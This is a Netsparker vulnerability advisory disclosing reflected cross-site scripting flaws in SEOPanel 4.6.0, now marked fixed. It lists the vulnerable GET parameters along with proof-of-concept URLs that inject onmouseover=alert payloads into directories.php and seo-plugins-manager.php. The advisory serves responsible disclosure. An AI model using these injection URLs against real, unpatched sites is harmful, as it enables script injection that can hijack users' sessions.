Hello, We are informing you about Cross-Site Scripting Vulnerabilities in SEOPanel 4.6.0. Information -------------------- Advisory by Netsparker Name: Cross-Site Scripting Vulnerabilities in SEOPanel Affected Software: SEOPanel Affected Versions: 4.6.0 Vendor Homepage: https://www.seopanel.org/ Vulnerability Type: Cross-Site Scripting Severity: Important Status: Fixed CVSS Score (3.0): 7.4 (High) Netsparker Advisory Reference: NS-20-005 Technical Details -------------------- SEO Panel root was at http://localhost:8080 Cross-site Scripting in Directories.php URL: http://localhost:8080/directories.php?capcheck=%27%22%20ns%3dnetsparker(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1 Parameter Name: capcheck Parameter Type: GET Attack: '" ns=netsparker(0x00E4E5) Proof URL: http://localhost:8080/directories.php?capcheck=%27%22%20onmouseover%3dalert(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1 Cross-site Scripting in seo-plugins-manager.php (5) URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x01434E)%20 Parameter Name: stscheck Parameter Type: GET Attack: '" ns=netsparker(0x01434E) Proof URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x01434E)%20 URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x00E492)%20 Parameter Name: stscheck Parameter Type: GET Attack: ''" ns=netsparker(0x00E492) Proof URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x00E492)%20 URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x011A0C)%20&pid=1&sec=listinfo Parameter Name: pageno Parameter Type: GET Attack: ''" ns=netsparker(0x011A0C) Proof URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x011A0C)%20&pid=1&sec=listinfo URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20ns%3dnetsparker(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select Parameter Name: pageno Parameter Type: GET Attack: '" ns=netsparker(0x01B8AB) Proof URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20onmouseover%3dalert(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select URL: http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x00DC5E)%20&pid=1&sec=listinfo Parameter Name: pageno Parameter Type: GET Attack: ''" ns=netsparker(0x00DC5E) Proof URL: http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x00DC5E)%20&pid=1&sec=listinfo For more information: https://www.netsparker.com/web-applications-advisories/ns-20-005-cross-site-scripting-in-seopanel/ Regards, [image: upload image] Daniel Bishtawi | Marketing Administrator E: daniel.bishtawi@netsparker.com